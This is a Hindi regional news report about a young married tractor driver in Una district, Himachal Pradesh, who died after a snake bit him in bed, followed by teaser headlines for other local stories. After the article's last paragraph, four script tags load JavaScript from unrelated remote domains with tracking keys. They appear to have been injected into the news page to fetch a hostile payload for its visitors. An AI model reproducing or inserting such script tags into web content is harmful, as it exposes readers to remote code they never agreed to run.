<p>जिला ऊना में सर्पदंश से एक युवक की मौत होने का मामला सामने आया है। यहां उपमंडल बंगाणा के गांव नारी देबी सिंह में 27 साल के युवक को बिस्तर पर सोए जहरीले सांप ने डंस लिया। युवक की पहचान मनोज कुमार पुत्र नानक चंद निवासी नारी देवी सिंह के रूप में हुई है। जानकारी के अनुसार बिस्तर पर लेटे युवक को एक जहरीले सांप ने काट लिया। जब परिजनों को इस बात का पता चला तो उन्होंने युवक को ऊना अस्पताल लेकर गए जहां डॉक्टरों ने उन्हें औपचारिक इलाज के बाद युवक को पीजीआई रेफर कर दिया।</p>
<p>युवक की हालत गंभीर होने के चलते परिजन उसे होशियारपुर ले गए। जहां पर निजी अस्पताल के स्टाफ ने युवक को मृत घोषित कर दिया। वापस ऊना पहुंचकर युवक का बंगाणा पुलिस की देखरेख में पोस्टमार्टम करवाया गया। बताते चले कि मृतक़ मनोज कुमार तीन भाई हैं। मृतक़ युवक ट्रैक्टर चालक था और अभी 6 माह पहले ही उसकी शादी हुई थी।</p>
<p>मृतक़ के पिता नानक चन्द और तीनों पुत्र मेहनत मजदूरी करके अपने परिवार का निर्वाह करते थे। सेल पोश मकान होने के कारण कुछ हिस्से में मकान बिल्कुल कच्चा है। इसमें ऐसी वारदात होने का डर भी हर समय रहता है। माता पिता का 27 साल का पुत्र और 6 माह की धर्मपत्नी का पति अब इस दुनिया को सदा के लिए अलविदा कहकर चला गया है। वहीं, थाना बंगाणा के एएसआई प्रेमपाल ने कहा कि ऊना अस्पताल में मृतक़ मनोज के शव का पोस्टमार्टम करवाकर परिजनों को सौंप दिया गया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1598434124804″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Sanjauli Mosque Demolition Controversy: राजधानी शिमला के संजौली क्षेत्र में स्थित मस्जिद की तीन अवैध…
CM Sukhu Announcement: मुख्यमंत्री सुखविंदर सिंह सुक्खू ने बुधवार को आईजीएमसी ट्रॉमा सैंटर के लोकार्पण…
शाहपुर का जिला स्तरीय दशहरा मेले का शुभारंभ भव्य शोभा यात्रा के साथ हुआ।…
CM Sukhwinder Singh Sukhu: हिमाचल प्रदेश के मुख्यमंत्री सुखविंदर सिंह सुक्खू ने इंदिरा गांधी मेडिकल…
Vikramaditya Singh Camp Office Mandi : मंडी की सांसद कंगना रनौत द्वारा मंडी में…
Chamba Tragic Death: चंबा जिले के चुराह क्षेत्र में एक दुखद घटना घटी, जहां चिकन…